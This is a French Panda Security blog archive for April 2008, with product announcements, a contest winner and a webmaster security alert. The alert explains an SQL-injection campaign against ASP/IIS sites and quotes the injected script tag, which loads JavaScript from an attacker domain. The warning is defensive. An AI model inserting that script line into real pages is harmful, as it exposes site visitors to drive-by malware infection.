« mars 2008 | Accueil | mai 2008 »

avril 2008

Panda Security Managed Office Protection disponible gratuitement en téléchargement

Panda Security invite les PME à télécharger et essayer gratuitement la version Bêta de sa solution Panda Security Managed Office Protection, disponible à l'adresse : http://www.pandasecurity.com/enterprise/downloads/beta/.

Reposant sur l'Intelligence Collective Antimalware, la technologie exclusive de Panda, cette solution innovante apporte aux PME un niveau de sécurité plus élevé avec une protection facile à gérer qui consomme peu de ressources. Cet outil est également parfait pour les revendeurs à valeur ajoutée qui souhaitent offrir des services de sécurité à leurs clients.

Quelques fonctionnalités & avantages du produit : console d'administration à distance, gestion par profils, transparence pour les utilisateurs, protection contre les menaces inconnues, firewall personnel administré, etc.

Webmasters : soyez vigilants !

Une menace guette votre code ASP. Cela dépend de la manière dont vous avez codé et si vous utilisez le logiciel de serveur web de Microsoft IIS (Internet Information Services). En effet, les cyber-criminels peuvent injecter du code SQL qui modifiera alors tous les codes sources des pages hébergées sur le serveur.

Les codes sources se verront ajouter ce petit bout de script associé à un tag IFRAME : <script src=http://www.nihaorr1.com/1.js>

Si un visiteur arrive sur une page qui contient cette ligne, il sera alors redirigé vers un site malicieux qui analysera l’ordinateur, de manière furtive, à la recherche de failles de sécurité qui pourraient être exploitées par des malwares.

Jusqu’à aujourd’hui, PandaLabs a recensé plus de 280 000 pages Web infectées. La plupart de ces pages ne montrent aucun signe particulier d’infection et il est donc difficile de savoir si telle ou telle page est infectée.

Vos pages sont infectées par ce code ?
Supprimez ce code de toutes vos pages web et avertissez le(s) responsable(s) du serveur qui hébergent ces pages.

La FIAT 500 a été gagnée par...

Gagnant du concours Fiat 500
Jean-Baptiste de LYON a remporté la FIAT 500 mise en jeu lors du concours organisé par Panda Security France du 30 septembre 2007 au 31 décembre 2007.

Quelques mots de notre gagnant : “Quelle surprise d’apprendre le gain de la petite et raffinée Fiat 500. Tellement improbable que l’on n’ose pas y croire… jusqu’à la remise des clés ! Les premiers tours de roues ont été très agréables et les 500 kilomètres qui suivirent, pour retourner sur Lyon, les furent tout autant. Ensuite, pour fêter cela, une balade puis une bonne bouteille dégustée en famille et entre amis !”

Nous félicitons l'heureux gagnant et remercions l'ensemble des participants du concours.

Service Pack pour les solutions Grand public 2008

Télécharger le Service Pack
Panda Security publie un Service Pack pour ses solutions Grand Public 2008 : Panda Antivirus 2008, Panda antivirus + Firewall 2008 et Panda Internet Security 2008. Grâce aux nombreuses améliorations apportées par ce Service Pack, les utilisateurs de ces solutions bénéficieront d'une plus grande sécurité face aux menaces Internet.

Cliquez ici pour télécharger le service pack. Il vous sera demandé votre nom d'utilisateur et votre mot de passe.

Nouveau : support en ligne en français

Le centre de support en ligne pour les particuliers est désormais disponible en français, à l'adresse http://www.pandasecurity.com/france/homeusers/support/.
Depuis cet espace, les utilisateurs des produits Panda grand public 2007 et 2008 peuvent consulter les réponses aux questions les plus fréquemment posées sur l'utilisation et la gestion de leur solution de sécurité.

Centre de support en ligne

En quelques clics, trouvez les réponses à vos questions, par exemple :
Comment télécharger la solution ?
Comment installer les licences sur plusieurs PC ?
Que faire lorsque j'ai changé de PC ?
Comment renouveler mon abonnement ?
Comment informer Panda que j'ai changé d'adresse email ?
Et de nombreuses autres questions…

20 ans d'innovation

  • Intelligence Collective

    Panda Security est le premier éditeur de solutions de sécurité à avoir exploité le potentiel du cloud computing avec le lancement de la technologie d'Intelligence Collective Antimalware. Ce modèle de sécurité novateur analyse et classe automatiquement les milliers de nouveaux virus et autres codes malveillants qui apparaissent chaque jour.

    Protection maximale
    Impact minimal

    Notre clientèle de particuliers et professionnels a ainsi la garantie de bénéficier de la plus efficace des protections contre les menaces Internet, avec un impact minimal sur les performances des ordinateurs. Les produits Panda sont disponibles en plus de 20 langues et commercialisés à des millions d’utilisateurs de 195 pays.

Flux

RSS